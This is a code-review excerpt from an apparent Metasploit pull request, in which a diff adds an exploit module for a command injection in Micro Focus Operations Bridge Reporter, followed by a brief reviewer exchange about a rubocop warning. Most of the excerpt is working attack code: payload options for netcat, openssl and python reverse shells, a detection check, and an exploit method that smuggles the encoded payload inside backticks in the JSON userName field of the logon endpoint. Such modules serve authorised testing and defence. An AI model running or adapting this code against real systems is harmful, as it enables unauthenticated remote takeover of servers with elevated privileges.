modules/exploits/linux/http/microfocus_obr_cmd_injection.rb

```diff
@@ -0,0 +1,116 @@
+            ['ZDI', '21-153'],
+            ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],
+            ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']
+          ],
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Payload' =>
+          {
+            'Space' => 1024, # This should be a safe value, it might take much more
+            'DisableNops' => true,
+            # avoid null char and the injection char (`)
+            'BadChars' => "\x00\x60",
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                # all of these (and more) should exist in a standard RHEL / SuSE
+                # ... which are the only two distros supported by Micro Focus OBR
+                # (telnet doesn't seem to work though)
+                #
+                # all reverse shells were tested and work flawlessly
+                'RequiredCmd' => 'netcat openssl generic python'
+              }
+          },
+        'Targets' =>
+          [
+            [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-02-09'
+      )
+    )
+
+    register_options(
+      [
+        # normal (no SSL) port is 21411
+        Opt::RPORT(21412),
+        OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
+        OptString.new('TARGETURI', [true, 'Application path', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => rand_text_alpha(10..64)
+    }, timeout = 10)
+
+    if res && res.code == 400 && res.body.include?('Unrecognized token')
+      # should return a stack trace like
+      # Unrecognized token '#{data}': was expecting ('true', 'false' or 'null')
+      #  at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...)
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    # if there are any 0x22 (") chars in the encoded payload, escape them with a backslash
+    # we have to do this manually, the encoder is not smart enough to do it, and it will
+    # fail if we put 0x22 as a bad char above
+    payload_enc = payload.encoded.gsub('"', '\\"')
+
+    # we use 0x60 (`) for injection, but there are lots of other possibilities
+    data = "{\"userName\":\"#{rand_text_alpha(1..16)}`#{payload_enc}`\",\"credential\":\"#{rand_text_alpha(8..20)}\"}"
+
+    send_request_raw({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => data
+    }, timeout = 0)
```

Comment:
```suggestion
    # rubocop:disable Lint/UselessAssignment
    send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => data
    }, timeout = 0)
    # rubocop:enable Lint/UselessAssignment
```

Reply:
Either do that or remove the assignment to the timeout variable. as the function should know its the timeout variable from its positioning in the argument list.